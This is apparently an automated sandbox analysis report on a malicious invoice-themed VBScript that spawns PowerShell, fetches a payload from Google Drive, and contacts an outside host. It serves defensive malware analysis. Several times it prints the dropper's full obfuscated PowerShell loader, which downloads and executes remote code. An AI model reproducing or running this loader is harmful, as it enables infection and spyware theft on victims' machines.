Source: unknown | HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz | source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` | source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb | source: newfile.exe

            Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | TCP traffic: 192.168.2.6:49713 -> 114.142.162.17:26
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 114.142.162.17
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73
Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPb
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
            Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

            System Summary

            Source: amsi32_6136.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6388
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6388
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3489B611
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3489C3C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD348960FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34896090
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34896715
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34893BFB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34896B70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04F6F258
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04F6FB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04F6EF10
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07DD9AA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00A54AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00A53EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00A54200
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00A5F858
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_003825D3
            Source: Factura2.vbs | Initial sample: Strings found which are bigger than 50
            Source: amsi32_6136.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@15/10@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Merogastrula.Bes
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Command line argument: #v | 12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Command line argument: WABOpen | 12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Command line argument: #v | 12_2_00381C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Command line argument: 58 | 12_2_00383530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5672
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6136
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: Factura2.vbs | Virustotal: Detection: 16%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu 